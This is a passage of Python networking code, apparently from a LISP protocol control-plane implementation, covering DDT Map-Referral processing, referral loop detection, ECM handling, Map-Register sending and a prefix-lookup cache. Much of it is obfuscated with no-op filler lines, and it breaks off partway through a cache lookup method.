if 19 - 19: OoooooooOO
if 31 - 31: I11i . OoOoOO00 - O0 * iII111i % I1Ii111 - II111iiii
if 21 - 21: OOooOOo . Oo0Ooo - i1IIi
if 56 - 56: I11i
def lisp_map_referral_loop ( mr , eid , group , action , s ) :
    """
    Detect a DDT referral loop for Map-Request queue entry 'mr'.

    A loop exists when a NODE or MS referral for (eid, group) received
    from referrer 's' is NOT more-specific than the prefix already
    cached on 'mr' from the previous referral.  Returns True (and logs
    the event) when a loop is detected, False otherwise.
    """
    referral_actions = ( LISP_DDT_ACTION_NODE_REFERRAL ,
        LISP_DDT_ACTION_MS_REFERRAL )
    if ( action not in referral_actions ) : return ( False )

    # Nothing cached yet means nothing to loop against.
    cached_eid = mr . last_cached_prefix [ 0 ]
    cached_group = mr . last_cached_prefix [ 1 ]
    if ( cached_eid == None ) : return ( False )

    # For (S,G) entries test the group first; fall back to the EID test.
    looping = ( group . is_null ( ) == False ) and cached_group . is_more_specific ( group )
    if ( looping == False ) :
        looping = cached_eid . is_more_specific ( eid )

    if ( looping ) :
        new_prefix = lisp_print_eid_tuple ( eid , group )
        old_prefix = lisp_print_eid_tuple ( cached_eid , cached_group )

        lprint ( ( "Map-Referral prefix {} from {} is not more-specific " + "than cached prefix {}" ) . format ( green ( new_prefix , False ) , s ,
            old_prefix ) )

    return ( looping )
if 79 - 79: IiII - Oo0Ooo - iIii1I11I1II1 % OoO0O00 - iIii1I11I1II1
if 6 - 6: OoO0O00
if 62 - 62: Ii1I
if 11 - 11: I1Ii111 + I1IiiI - OOooOOo
if 56 - 56: II111iiii + IiII * iIii1I11I1II1 - i1IIi + iIii1I11I1II1
if 98 - 98: Oo0Ooo . iIii1I11I1II1
if 12 - 12: I11i - i11iIiiIii * OoOoOO00 - OoOoOO00 * II111iiii
def lisp_process_map_referral ( lisp_sockets , packet , source ) :
 """Process a received DDT Map-Referral message.

 For each EID-record in the message: match it to a queued Map-Request
 by nonce, run loop detection, create or update the referral-cache
 entry (merging the RLOC-records into its referral-set), and then act
 on the referral action code (delegation hole, not authoritative,
 not registered, node/MS referral, MS ack).  Returns None.

 Note: the 'if N - N:' one-liners are obfuscator-inserted no-ops and
 are preserved untouched.
 """
 if 45 - 45: I1ii11iIi11i - iIii1I11I1II1 . Ii1I * Oo0Ooo - OoO0O00
 O0OOoOoOO = lisp_map_referral ( )
 packet = O0OOoOoOO . decode ( packet )
 if ( packet == None ) :
  lprint ( "Could not decode Map-Referral packet" )
  return
 if 74 - 74: I1IiiI / o0oOOo0O0Ooo
 O0OOoOoOO . print_map_referral ( )
 if 53 - 53: iIii1I11I1II1 * oO0o
 IiII1iiI = source . print_address ( )
 oOO000 = O0OOoOoOO . nonce
 if 43 - 43: IiII * Oo0Ooo / OOooOOo % oO0o
 if 11 - 11: OoOoOO00 * Oo0Ooo / I11i * OOooOOo
 if 15 - 15: ooOoO0o - OOooOOo / OoooooooOO
 if 41 - 41: OoOoOO00 . iII111i . i1IIi + oO0o
 for IiIIi1IiiIiI in range ( O0OOoOoOO . record_count ) :
  iiI = lisp_eid_record ( )
  packet = iiI . decode ( packet )
  if ( packet == None ) :
   lprint ( "Could not decode EID-record in Map-Referral packet" )
   return
  if 60 - 60: oO0o * I1Ii111
  iiI . print_record ( " " , True )
  if 81 - 81: oO0o - OOooOOo - oO0o
  if 54 - 54: oO0o % I11i
  if 71 - 71: oO0o / I1ii11iIi11i . Ii1I % II111iiii
  if 22 - 22: iIii1I11I1II1 - OoooooooOO
  # Match the referral to a queued Map-Request by nonce; otherwise the
  # EID-record is ignored.
  ii1i1I1111ii = str ( oOO000 )
  if ( ii1i1I1111ii not in lisp_ddt_map_requestQ ) :
   lprint ( ( "Map-Referral nonce 0x{} from {} not found in " + "Map-Request queue, EID-record ignored" ) . format ( lisp_hex_string ( oOO000 ) , IiII1iiI ) )
   if 8 - 8: ooOoO0o % i11iIiiIii
   if 41 - 41: I1Ii111 . ooOoO0o - i11iIiiIii + Ii1I . OOooOOo . OoOoOO00
   continue
  if 70 - 70: i1IIi % OoOoOO00 / iII111i + i11iIiiIii % ooOoO0o + IiII
  O0o00000o0O = lisp_ddt_map_requestQ [ ii1i1I1111ii ]
  if ( O0o00000o0O == None ) :
   lprint ( ( "No Map-Request queue entry found for Map-Referral " +
   "nonce 0x{} from {}, EID-record ignored" ) . format ( lisp_hex_string ( oOO000 ) , IiII1iiI ) )
   if 58 - 58: OOooOOo / i11iIiiIii . Oo0Ooo % iII111i
   continue
  if 92 - 92: OoOoOO00 / ooOoO0o % iII111i / iIii1I11I1II1
  if 73 - 73: O0 % i11iIiiIii
  if 16 - 16: O0
  if 15 - 15: i1IIi % i11iIiiIii
  if 18 - 18: Ii1I . OoO0O00 . iII111i * oO0o + O0
  if 35 - 35: OoOoOO00 . oO0o / II111iiii
  # Drop looping referrals and give up on that Map-Request.
  if ( lisp_map_referral_loop ( O0o00000o0O , iiI . eid , iiI . group ,
  iiI . action , IiII1iiI ) ) :
   O0o00000o0O . dequeue_map_request ( )
   continue
  if 97 - 97: Ii1I + I1Ii111 / II111iiii
  if 14 - 14: iII111i / IiII / oO0o
  O0o00000o0O . last_cached_prefix [ 0 ] = iiI . eid
  O0o00000o0O . last_cached_prefix [ 1 ] = iiI . group
  if 55 - 55: OoO0O00 % O0
  if 92 - 92: OoooooooOO / O0
  if 14 - 14: i11iIiiIii
  if 43 - 43: OOooOOo
  # Find or create the referral-cache entry for this (eid, group).
  I1i1 = False
  OOoO = lisp_referral_cache_lookup ( iiI . eid , iiI . group ,
  True )
  if ( OOoO == None ) :
   I1i1 = True
   OOoO = lisp_referral ( )
   OOoO . eid = iiI . eid
   OOoO . group = iiI . group
   if ( iiI . ddt_incomplete == False ) : OOoO . add_cache ( )
  elif ( OOoO . referral_source . not_set ( ) ) :
   lprint ( "Do not replace static referral entry {}" . format ( green ( OOoO . print_eid_tuple ( ) , False ) ) )
   if 79 - 79: iII111i % Oo0Ooo . i1IIi % ooOoO0o
   O0o00000o0O . dequeue_map_request ( )
   continue
  if 93 - 93: OoOoOO00
  if 49 - 49: i1IIi * OOooOOo % I11i * Ii1I . I1Ii111 * iIii1I11I1II1
  # Refresh the referral metadata and TTL from the received record.
  OOo000 = iiI . action
  OOoO . referral_source = source
  OOoO . referral_type = OOo000
  oo0o = iiI . store_ttl ( )
  OOoO . referral_ttl = oo0o
  OOoO . expires = lisp_set_timestamp ( oo0o )
  if 72 - 72: ooOoO0o
  if 63 - 63: Oo0Ooo . OoO0O00 . OoooooooOO / i1IIi
  if 53 - 53: OOooOOo * O0 . iII111i
  if 3 - 3: OoooooooOO * I1Ii111 * IiII - OOooOOo * I1Ii111
  # Track up/down state of the referring node based on whether this is
  # a negative referral.
  o0O0oOoO0O0O = OOoO . is_referral_negative ( )
  if ( OOoO . referral_set . has_key ( IiII1iiI ) ) :
   ii = OOoO . referral_set [ IiII1iiI ]
   if 91 - 91: Oo0Ooo / I1ii11iIi11i - Oo0Ooo
   if ( ii . updown == False and o0O0oOoO0O0O == False ) :
    ii . updown = True
    lprint ( "Change up/down status for referral-node {} to up" . format ( IiII1iiI ) )
    if 31 - 31: OoooooooOO
   elif ( ii . updown == True and o0O0oOoO0O0O == True ) :
    ii . updown = False
    lprint ( ( "Change up/down status for referral-node {} " + "to down, received negative referral" ) . format ( IiII1iiI ) )
  if 51 - 51: O0 - O0
  if 64 - 64: i11iIiiIii / oO0o . oO0o - Oo0Ooo
  if 48 - 48: i1IIi + I1ii11iIi11i + I1Ii111 - iII111i
  if 3 - 3: i1IIi + OoooooooOO * ooOoO0o + I1Ii111 % OOooOOo / IiII
  if 70 - 70: oO0o + i1IIi % o0oOOo0O0Ooo - I11i
  if 74 - 74: i11iIiiIii
  if 93 - 93: I1Ii111 % OOooOOo * I1IiiI % iII111i / iIii1I11I1II1 + OoO0O00
  if 6 - 6: I11i
  # Remember the current referral-set keys; any key not re-advertised in
  # this message is removed after the RLOC loop below.
  O00o0Oo = { }
  for ii1i1I1111ii in OOoO . referral_set : O00o0Oo [ ii1i1I1111ii ] = None
  if 62 - 62: Ii1I
  if 75 - 75: o0oOOo0O0Ooo * i11iIiiIii - OoooooooOO * OOooOOo
  if 11 - 11: oO0o
  if 14 - 14: OoooooooOO . I1ii11iIi11i % I1IiiI / I1IiiI % Oo0Ooo
  # Merge the RLOC-records into the referral-set.
  for IiIIi1IiiIiI in range ( iiI . rloc_count ) :
   iIii1IiIiI = lisp_rloc_record ( )
   packet = iIii1IiIiI . decode ( packet , None )
   if ( packet == None ) :
    lprint ( "Could not decode RLOC-record in Map-Referral packet" )
    return
   if 97 - 97: i1IIi
   iIii1IiIiI . print_record ( " " )
   if 6 - 6: Ii1I
   if 43 - 43: i1IIi - Ii1I % iIii1I11I1II1 . OoO0O00 + oO0o - iIii1I11I1II1
   if 17 - 17: IiII . i1IIi
   if 37 - 37: OoooooooOO + Oo0Ooo - Oo0Ooo + I1ii11iIi11i . I1Ii111 / I1IiiI
   oo0o00OO = iIii1IiIiI . rloc . print_address ( )
   if ( OOoO . referral_set . has_key ( oo0o00OO ) == False ) :
    ii = lisp_referral_node ( )
    ii . referral_address . copy_address ( iIii1IiIiI . rloc )
    OOoO . referral_set [ oo0o00OO ] = ii
    if ( IiII1iiI == oo0o00OO and o0O0oOoO0O0O ) : ii . updown = False
   else :
    ii = OOoO . referral_set [ oo0o00OO ]
    if ( O00o0Oo . has_key ( oo0o00OO ) ) : O00o0Oo . pop ( oo0o00OO )
   if 60 - 60: I1IiiI % Ii1I / I1Ii111 + Ii1I
   ii . priority = iIii1IiIiI . priority
   ii . weight = iIii1IiIiI . weight
  if 43 - 43: I1ii11iIi11i + I11i
  if 83 - 83: II111iiii + o0oOOo0O0Ooo - I1Ii111
  if 100 - 100: IiII - OoOoOO00 / I11i
  if 33 - 33: I1Ii111 * OoOoOO00 . I1ii11iIi11i % I1Ii111
  if 87 - 87: Oo0Ooo
  # Purge referral-nodes that were not in this Map-Referral.
  for ii1i1I1111ii in O00o0Oo : OOoO . referral_set . pop ( ii1i1I1111ii )
  if 65 - 65: ooOoO0o . I1IiiI
  I11i11i1 = OOoO . print_eid_tuple ( )
  if 51 - 51: IiII
  if ( I1i1 ) :
   if ( iiI . ddt_incomplete ) :
    lprint ( "Suppress add {} to referral-cache" . format ( green ( I11i11i1 , False ) ) )
    if 43 - 43: oO0o - I11i . i11iIiiIii
   else :
    lprint ( "Add {}, referral-count {} to referral-cache" . format ( green ( I11i11i1 , False ) , iiI . rloc_count ) )
   if 78 - 78: i11iIiiIii + Oo0Ooo * Ii1I - o0oOOo0O0Ooo % i11iIiiIii
   if 30 - 30: I1IiiI % oO0o * OoooooooOO
  else :
   lprint ( "Replace {}, referral-count: {} in referral-cache" . format ( green ( I11i11i1 , False ) , iiI . rloc_count ) )
  if 64 - 64: I1IiiI
  if 11 - 11: I1ii11iIi11i % iII111i / II111iiii % ooOoO0o % IiII
  if 14 - 14: ooOoO0o / IiII . o0oOOo0O0Ooo
  if 27 - 27: I1IiiI - OOooOOo . II111iiii * I1ii11iIi11i % ooOoO0o / I1IiiI
  if 90 - 90: o0oOOo0O0Ooo / I1ii11iIi11i - oO0o - Ii1I - I1IiiI + I1Ii111
  if 93 - 93: I1IiiI - I11i . I1IiiI - iIii1I11I1II1
  # Delegation hole: answer the ITR with a 15-minute negative Map-Reply.
  if ( OOo000 == LISP_DDT_ACTION_DELEGATION_HOLE ) :
   lisp_send_negative_map_reply ( O0o00000o0O . lisp_sockets , OOoO . eid ,
   OOoO . group , O0o00000o0O . nonce , O0o00000o0O . itr , O0o00000o0O . sport , 15 , None , False )
   O0o00000o0O . dequeue_map_request ( )
  if 1 - 1: O0 . Ii1I % Ii1I + II111iiii . oO0o
  if 24 - 24: o0oOOo0O0Ooo . I1Ii111 % O0
  # Not authoritative: retry through the root once, then give up with a
  # 0-TTL negative Map-Reply.
  if ( OOo000 == LISP_DDT_ACTION_NOT_AUTH ) :
   if ( O0o00000o0O . tried_root ) :
    lisp_send_negative_map_reply ( O0o00000o0O . lisp_sockets , OOoO . eid ,
    OOoO . group , O0o00000o0O . nonce , O0o00000o0O . itr , O0o00000o0O . sport , 0 , None , False )
    O0o00000o0O . dequeue_map_request ( )
   else :
    lisp_send_ddt_map_request ( O0o00000o0O , True )
  if 67 - 67: I1IiiI * Ii1I
  if 64 - 64: OOooOOo
  if 90 - 90: iII111i . OoOoOO00 + i1IIi % ooOoO0o * I11i + OoooooooOO
  # MS reports EID not registered: mark the referrer down and retry via
  # another referral-node if one remains.
  if ( OOo000 == LISP_DDT_ACTION_MS_NOT_REG ) :
   if ( OOoO . referral_set . has_key ( IiII1iiI ) ) :
    ii = OOoO . referral_set [ IiII1iiI ]
    ii . updown = False
   if 2 - 2: o0oOOo0O0Ooo . II111iiii
   if ( len ( OOoO . referral_set ) == 0 ) :
    O0o00000o0O . dequeue_map_request ( )
   else :
    lisp_send_ddt_map_request ( O0o00000o0O , False )
  if 9 - 9: I1Ii111 - II111iiii + OoOoOO00 . OoO0O00
  if 33 - 33: Oo0Ooo
  if 12 - 12: i11iIiiIii . Oo0Ooo / OoOoOO00 + iII111i . Ii1I + ooOoO0o
  # Node/MS referral: follow the referral chain; an exact match that has
  # already tried the root ends with a negative Map-Reply.
  if ( OOo000 in ( LISP_DDT_ACTION_NODE_REFERRAL ,
  LISP_DDT_ACTION_MS_REFERRAL ) ) :
   if ( O0o00000o0O . eid . is_exact_match ( iiI . eid ) ) :
    if ( not O0o00000o0O . tried_root ) :
     lisp_send_ddt_map_request ( O0o00000o0O , True )
    else :
     lisp_send_negative_map_reply ( O0o00000o0O . lisp_sockets ,
     OOoO . eid , OOoO . group , O0o00000o0O . nonce , O0o00000o0O . itr ,
     O0o00000o0O . sport , 15 , None , False )
     O0o00000o0O . dequeue_map_request ( )
    if 66 - 66: IiII
   else :
    lisp_send_ddt_map_request ( O0o00000o0O , False )
  if 41 - 41: II111iiii + Oo0Ooo / iII111i . IiII / iII111i / I1IiiI
  if 78 - 78: o0oOOo0O0Ooo % OoOoOO00 . O0
  if 41 - 41: iIii1I11I1II1 . OOooOOo - Oo0Ooo % OOooOOo
  # MS ack: the Map-Request has been satisfied.
  if ( OOo000 == LISP_DDT_ACTION_MS_ACK ) : O0o00000o0O . dequeue_map_request ( )
 if 90 - 90: i11iIiiIii + OoooooooOO - i11iIiiIii + OoooooooOO
 return
if 23 - 23: i11iIiiIii - IiII - I1ii11iIi11i + I1ii11iIi11i % I1IiiI
if 79 - 79: II111iiii / OoooooooOO
if 35 - 35: i1IIi + IiII + II111iiii % OOooOOo
if 25 - 25: I11i + i11iIiiIii + O0 - Ii1I
if 69 - 69: I11i . OoOoOO00 / OOooOOo / i1IIi . II111iiii
if 17 - 17: I1Ii111
if 2 - 2: O0 % OoOoOO00 + oO0o
if 24 - 24: iII111i + iII111i - OoooooooOO % OoooooooOO * O0
def lisp_process_ecm ( lisp_sockets , packet , source , ecm_port ) :
    """
    Decapsulate a received Encapsulated-Control-Message and hand the
    inner Map-Request to lisp_process_map_request().  Any other inner
    message type is logged and dropped.  Returns None.
    """
    ecm = lisp_ecm ( 0 )
    packet = ecm . decode ( packet )
    if ( packet == None ) :
        lprint ( "Could not decode ECM packet" )
        return

    ecm . print_ecm ( )

    # Peek at the inner control header to learn the inner message type.
    inner_header = lisp_control_header ( )
    if ( inner_header . decode ( packet ) == None ) :
        lprint ( "Could not decode control header" )
        return

    inner_type = inner_header . type
    del ( inner_header )

    if ( inner_type != LISP_MAP_REQUEST ) :
        lprint ( "Received ECM without Map-Request inside" )
        return

    # Process the inner Map-Request, passing along the addressing
    # information carried by the ECM header.
    inner_sport = ecm . udp_sport
    lisp_process_map_request ( lisp_sockets , packet , source , ecm_port ,
        ecm . source , inner_sport , ecm . ddt , - 1 )
    return
if 83 - 83: I1Ii111 * II111iiii
if 28 - 28: I11i - Oo0Ooo + iIii1I11I1II1 + O0 * Ii1I + I1IiiI
if 13 - 13: iII111i
if 42 - 42: I1Ii111 - I1IiiI % I1IiiI * I1IiiI
if 70 - 70: O0 / I1IiiI / I1IiiI
if 71 - 71: OOooOOo - Oo0Ooo + IiII * oO0o
if 90 - 90: OoOoOO00 * I1ii11iIi11i
if 16 - 16: i1IIi - OoO0O00
if 61 - 61: o0oOOo0O0Ooo + OoOoOO00 - ooOoO0o + ooOoO0o % ooOoO0o % II111iiii
if 16 - 16: I1IiiI . Ii1I
def lisp_send_map_register ( lisp_sockets , packet , map_register , ms ) :
    """
    Authenticate and transmit a Map-Register to map-server 'ms'.

    For a LISP-Decent push configuration, the first Map-Register toward
    a multicast peer-group is redirected to the local loopback address
    to bootstrap the mapping system.  When the map-server has an
    encryption key configured, everything after the first 4 bytes of
    the message is ChaCha-encrypted before transmission.
    """
    dest = ms . map_server

    # LISP-Decent bootstrap case: first register to a multicast
    # peer-group goes to 127.0.0.1 instead of the group address.
    if ( lisp_decent_push_configured and dest . is_multicast_address ( ) and
        ( ms . map_registers_multicast_sent == 1 or ms . map_registers_sent == 1 ) ) :
        dest = copy . deepcopy ( dest )
        dest . address = 0x7f000001
        title = bold ( "Bootstrap" , False )
        peer_group = ms . map_server . print_address_no_iid ( )
        lprint ( "{} mapping system for peer-group {}" . format ( title , peer_group ) )

    # Fill in the authentication hash for this map-server's password.
    packet = lisp_compute_auth ( packet , map_register , ms . password )

    # Optionally encrypt the payload (all but the first 4 bytes).
    if ( ms . ekey != None ) :
        chacha_key = ms . ekey . zfill ( 32 )
        chacha_iv = "0" * 8
        ciphertext = chacha . ChaCha ( chacha_key , chacha_iv ) . encrypt ( packet [ 4 : : ] )
        packet = packet [ 0 : 4 ] + ciphertext
        title = bold ( "Encrypt" , False )
        lprint ( "{} Map-Register with key-id {}" . format ( title , ms . ekey_id ) )

    decent_suffix = ""
    if ( lisp_decent_pull_xtr_configured ( ) ) :
        decent_suffix = ", decent-index {}" . format ( bold ( ms . dns_name , False ) )

    lprint ( "Send Map-Register to map-server {}{}{}" . format ( dest . print_address ( ) , ", ms-name '{}'" . format ( ms . ms_name ) , decent_suffix ) )
    lisp_send ( lisp_sockets , dest , LISP_CTRL_PORT , packet )
    return
if 68 - 68: OOooOOo * ooOoO0o . I1IiiI - iII111i
if 81 - 81: I11i % Oo0Ooo / iII111i
if 44 - 44: Oo0Ooo
if 90 - 90: Oo0Ooo . ooOoO0o / IiII * I1Ii111 . ooOoO0o + II111iiii
if 43 - 43: iIii1I11I1II1 % OOooOOo + OoOoOO00 + I1ii11iIi11i - Oo0Ooo / Ii1I
if 94 - 94: Ii1I / Oo0Ooo % II111iiii % Oo0Ooo * oO0o
if 54 - 54: O0 / ooOoO0o * I1Ii111
if 5 - 5: Ii1I / OoOoOO00 - O0 * OoO0O00
def lisp_send_ipc_to_core ( lisp_socket , packet , dest , port ) :
    """
    Wrap control packet 'packet' in an IPC header and send it over
    'lisp_socket' to the lisp-core process, which owns the real
    control sockets and will forward it to 'dest'/'port'.
    """
    ipc_source = lisp_socket . getsockname ( )
    dest_str = dest . print_address_no_iid ( )

    lprint ( "Send IPC {} bytes to {} {}, control-packet: {}" . format ( len ( packet ) , dest_str , port , lisp_format_packet ( packet ) ) )

    ipc_packet = lisp_control_packet_ipc ( packet , ipc_source , dest_str , port )
    lisp_ipc ( ipc_packet , lisp_socket , "lisp-core-pkt" )
    return
if 95 - 95: oO0o / Ii1I + OoO0O00
if 57 - 57: iIii1I11I1II1 + I1Ii111 % oO0o - Ii1I . I1IiiI
if 39 - 39: OoO0O00 + II111iiii
if 98 - 98: O0 - I1Ii111 % oO0o - iII111i + Ii1I * i1IIi
if 76 - 76: o0oOOo0O0Ooo
if 55 - 55: OOooOOo + I1ii11iIi11i * Oo0Ooo
if 11 - 11: i1IIi - OoooooooOO * OoOoOO00 / oO0o - OoooooooOO - I1IiiI
if 22 - 22: i11iIiiIii . Ii1I . Oo0Ooo * Oo0Ooo - iII111i / I1ii11iIi11i
def lisp_send_map_reply ( lisp_sockets , packet , dest , port ) :
    """Log and forward a Map-Reply to 'dest' via the lisp-core process."""
    ipc_socket = lisp_sockets [ 2 ]
    lprint ( "Send Map-Reply to {}" . format ( dest . print_address_no_iid ( ) ) )
    lisp_send_ipc_to_core ( ipc_socket , packet , dest , port )
    return
if 49 - 49: iII111i + I11i . Oo0Ooo
if 23 - 23: I1IiiI . Ii1I + ooOoO0o . OoooooooOO
if 57 - 57: OOooOOo / OoOoOO00 / i11iIiiIii - I11i - I11i . Ii1I
if 53 - 53: ooOoO0o . iII111i + Ii1I * I1Ii111
if 49 - 49: II111iiii . I1ii11iIi11i * OoOoOO00 - OOooOOo
if 48 - 48: OoO0O00 . iIii1I11I1II1 - OoooooooOO + I1Ii111 / i11iIiiIii . Oo0Ooo
if 61 - 61: II111iiii + OOooOOo . o0oOOo0O0Ooo . iIii1I11I1II1
if 63 - 63: I11i + i11iIiiIii . o0oOOo0O0Ooo . i1IIi + OoOoOO00
def lisp_send_map_referral ( lisp_sockets , packet , dest , port ) :
    """Log and forward a Map-Referral to 'dest' via the lisp-core process."""
    ipc_socket = lisp_sockets [ 2 ]
    lprint ( "Send Map-Referral to {}" . format ( dest . print_address ( ) ) )
    lisp_send_ipc_to_core ( ipc_socket , packet , dest , port )
    return
if 1 - 1: i11iIiiIii
if 1 - 1: iIii1I11I1II1
if 73 - 73: iII111i + IiII
if 95 - 95: O0
if 75 - 75: ooOoO0o
if 8 - 8: O0 - OoooooooOO + I1ii11iIi11i / Oo0Ooo . oO0o + I1Ii111
if 85 - 85: ooOoO0o
if 29 - 29: iII111i . Ii1I
def lisp_send_map_notify ( lisp_sockets , packet , dest , port ) :
    """Log and forward a Map-Notify to xTR 'dest' via the lisp-core process."""
    ipc_socket = lisp_sockets [ 2 ]
    lprint ( "Send Map-Notify to xTR {}" . format ( dest . print_address ( ) ) )
    lisp_send_ipc_to_core ( ipc_socket , packet , dest , port )
    return
if 43 - 43: I11i - I1ii11iIi11i + iIii1I11I1II1 / I1ii11iIi11i * oO0o / iIii1I11I1II1
if 45 - 45: IiII
if 49 - 49: I1IiiI . Ii1I * I1IiiI - OoooooooOO . I11i / I1Ii111
if 9 - 9: iIii1I11I1II1 * Ii1I / O0 - OOooOOo
if 95 - 95: i11iIiiIii * II111iiii * OOooOOo * iIii1I11I1II1
if 22 - 22: iIii1I11I1II1 / I1IiiI + OoOoOO00 - OOooOOo . i11iIiiIii / i11iIiiIii
if 10 - 10: iIii1I11I1II1 % i1IIi
def lisp_send_ecm ( lisp_sockets , packet , inner_source , inner_sport , inner_dest ,
    outer_dest , to_etr = False , to_ms = False , ddt = False ) :
    """
    Prepend an Encapsulated-Control-Message header to 'packet' and send
    the result to 'outer_dest' on the LISP control port.  The to-ETR and
    to-MS header bits are only set when the corresponding local process
    is actually running.  Returns None.
    """
    if ( inner_source == None or inner_source . is_null ( ) ) :
        inner_source = inner_dest

    # When behind a NAT, use the translated port as the inner UDP
    # source port.
    if ( lisp_nat_traversal ) :
        translated_port = lisp_get_any_translated_port ( )
        if ( translated_port != None ) : inner_sport = translated_port

    ecm = lisp_ecm ( inner_sport )
    ecm . to_etr = to_etr if lisp_is_running ( "lisp-etr" ) else False
    ecm . to_ms = to_ms if lisp_is_running ( "lisp-ms" ) else False
    ecm . ddt = ddt

    ecm_header = ecm . encode ( packet , inner_source , inner_dest )
    if ( ecm_header == None ) :
        lprint ( "Could not encode ECM message" )
        return

    ecm . print_ecm ( )
    packet = ecm_header + packet

    addr_str = outer_dest . print_address_no_iid ( )
    lprint ( "Send Encapsulated-Control-Message to {}" . format ( addr_str ) )

    dest = lisp_convert_4to6 ( addr_str )
    lisp_send ( lisp_sockets , dest , LISP_CTRL_PORT , packet )
    return
if 90 - 90: OoooooooOO * ooOoO0o
if 14 - 14: I1IiiI % i1IIi
if 35 - 35: ooOoO0o % o0oOOo0O0Ooo % ooOoO0o
if 77 - 77: OOooOOo % I1Ii111 / i11iIiiIii . i1IIi % OOooOOo
if 55 - 55: i1IIi
if 64 - 64: oO0o . OOooOOo * i11iIiiIii + I1Ii111
if 88 - 88: O0
#
# LISP Address Family Identifiers.  Positive values are real AFIs used
# on the wire; negative values are internal-only pseudo-AFIs (they can
# never appear in a packet).
# (Dead obfuscation filler statements removed from this section.)
#
LISP_AFI_GEO_COORD = -3      # internal pseudo-AFI: geo-coordinate address
LISP_AFI_IID_RANGE = -2      # internal pseudo-AFI: instance-ID range
LISP_AFI_ULTIMATE_ROOT = -1  # internal pseudo-AFI: root of the hierarchy
LISP_AFI_NONE = 0
LISP_AFI_IPV4 = 1
LISP_AFI_IPV6 = 2
LISP_AFI_MAC = 6
LISP_AFI_E164 = 8
LISP_AFI_NAME = 17           # distinguished name
LISP_AFI_LCAF = 16387        # LISP Canonical Address Format

#
# RLOC state values.
#
LISP_RLOC_UNKNOWN_STATE = 0
LISP_RLOC_UP_STATE = 1
LISP_RLOC_DOWN_STATE = 2
LISP_RLOC_UNREACH_STATE = 3
LISP_RLOC_NO_ECHOED_NONCE_STATE = 4
LISP_RLOC_ADMIN_DOWN_STATE = 5

#
# Authentication algorithm IDs.
#
LISP_AUTH_NONE = 0
LISP_AUTH_MD5 = 1
LISP_AUTH_SHA1 = 2
LISP_AUTH_SHA2 = 3

#
# Host mask lengths per address family.
#
LISP_IPV4_HOST_MASK_LEN = 32
LISP_IPV6_HOST_MASK_LEN = 128
LISP_MAC_HOST_MASK_LEN = 48
LISP_E164_HOST_MASK_LEN = 60
if 74 - 74: I1IiiI . O0 . IiII + IiII - IiII
if 100 - 100: ooOoO0o / OoooooooOO
if 73 - 73: i11iIiiIii - Oo0Ooo
if 100 - 100: iIii1I11I1II1 + I1Ii111
if 51 - 51: o0oOOo0O0Ooo * I11i
if 42 - 42: OOooOOo % I11i
def byte_swap_64 ( address ) :
    """
    Return the 64-bit integer 'address' with its byte order reversed
    (byte 0 becomes byte 7, byte 1 becomes byte 6, and so on).  Bits
    above the low 64 are discarded, matching the masked original.
    """
    swapped = 0
    for byte_index in range ( 8 ) :
        byte_value = ( address >> ( byte_index * 8 ) ) & 0xff
        swapped |= byte_value << ( ( 7 - byte_index ) * 8 )
    return ( swapped )
if 83 - 83: OoooooooOO / I1IiiI + iII111i - iIii1I11I1II1 % ooOoO0o
if 74 - 74: OoO0O00
if 13 - 13: I1ii11iIi11i / OoO0O00
if 90 - 90: iIii1I11I1II1 - OoO0O00 . i1IIi / o0oOOo0O0Ooo + O0
if 94 - 94: IiII * i1IIi
if 90 - 90: O0 % I1IiiI . o0oOOo0O0Ooo % ooOoO0o % I1IiiI
if 16 - 16: OoO0O00 / OOooOOo / iIii1I11I1II1 / OoooooooOO . oO0o - I1Ii111
if 43 - 43: OoOoOO00 % OOooOOo / I1IiiI + I1IiiI
if 40 - 40: OOooOOo . I1Ii111 + I1Ii111
if 4 - 4: iIii1I11I1II1 - iIii1I11I1II1 * I11i
if 32 - 32: I1IiiI + II111iiii * iII111i + O0 / O0 * Oo0Ooo
if 64 - 64: i11iIiiIii / iII111i + i11iIiiIii . I11i
if 66 - 66: i1IIi
if 98 - 98: Oo0Ooo / iIii1I11I1II1
if 33 - 33: O0 - iII111i
class lisp_cache_entries ( ) :
    """One mask-length bucket of a lisp_cache: the entries stored under a
    single key length, plus a sorted list of their keys."""
    def __init__ ( self ) :
        self.entries = {}          # lookup-key string -> cached entry
        self.entries_sorted = []   # sorted keys of self.entries
if 87 - 87: OoOoOO00
class lisp_cache():
    """Longest-prefix-match cache used for the map-cache, referral cache,
    DDT cache, and site-EID table.

    Entries are bucketed by an ordering key derived from the prefix mask
    length, and within a bucket keyed by a hex string built from
    instance-id + AFI + address.  Fixed: replaced Python-2-only
    dict.has_key() with the 'in' operator (works on both 2 and 3).
    """
    def __init__(self):
        self.cache = {}          # mask-length key -> lisp_cache_entries
        self.cache_sorted = []   # sorted mask-length keys
        self.cache_count = 0     # total number of entries in all buckets

    def cache_size(self):
        """Return the total number of entries cached."""
        return (self.cache_count)

    def build_key(self, prefix):
        """Return [mask-key, entry-key] for prefix.

        The mask-key orders buckets so shorter prefixes sort first; the
        +48 offset keeps ordinary AFI prefixes after ultimate-root and
        IID-range entries.  The entry-key concatenates zero-filled hex
        instance-id, AFI, and address strings.
        """
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT):
            mask_key = 0
        elif (prefix.afi == LISP_AFI_IID_RANGE):
            mask_key = prefix.mask_len
        else:
            mask_key = prefix.mask_len + 48

        iid = lisp_hex_string(prefix.instance_id).zfill(8)
        afi = lisp_hex_string(prefix.afi).zfill(4)

        if (prefix.afi > 0):
            if (prefix.is_binary()):
                length = prefix.addr_length() * 2
                addr = lisp_hex_string(prefix.address).zfill(length)
            else:
                addr = prefix.address
        elif (prefix.afi == LISP_AFI_GEO_COORD):
            afi = "8003"
            addr = prefix.address.print_geo()
        else:
            afi = ""
            addr = ""

        key = iid + afi + addr
        return ([mask_key, key])

    def add_cache(self, prefix, entry):
        """Insert (or replace) 'entry' for 'prefix', creating the
        mask-length bucket on first use."""
        if (prefix.is_binary()): prefix.zero_host_bits()
        mask_key, key = self.build_key(prefix)
        if (mask_key not in self.cache):
            self.cache[mask_key] = lisp_cache_entries()
            self.cache[mask_key].entries = {}
            self.cache[mask_key].entries_sorted = []
            self.cache_sorted = sorted(self.cache)

        if (key not in self.cache[mask_key].entries):
            self.cache_count += 1

        self.cache[mask_key].entries[key] = entry
        self.cache[mask_key].entries_sorted = \
            sorted(self.cache[mask_key].entries)

    def lookup_cache(self, prefix, exact):
        """Look up 'prefix'.  When 'exact', return the entry stored under
        exactly this key or None.  Otherwise return the best (most
        specific) covering entry found, or None."""
        mask_key, key = self.build_key(prefix)
        if (exact):
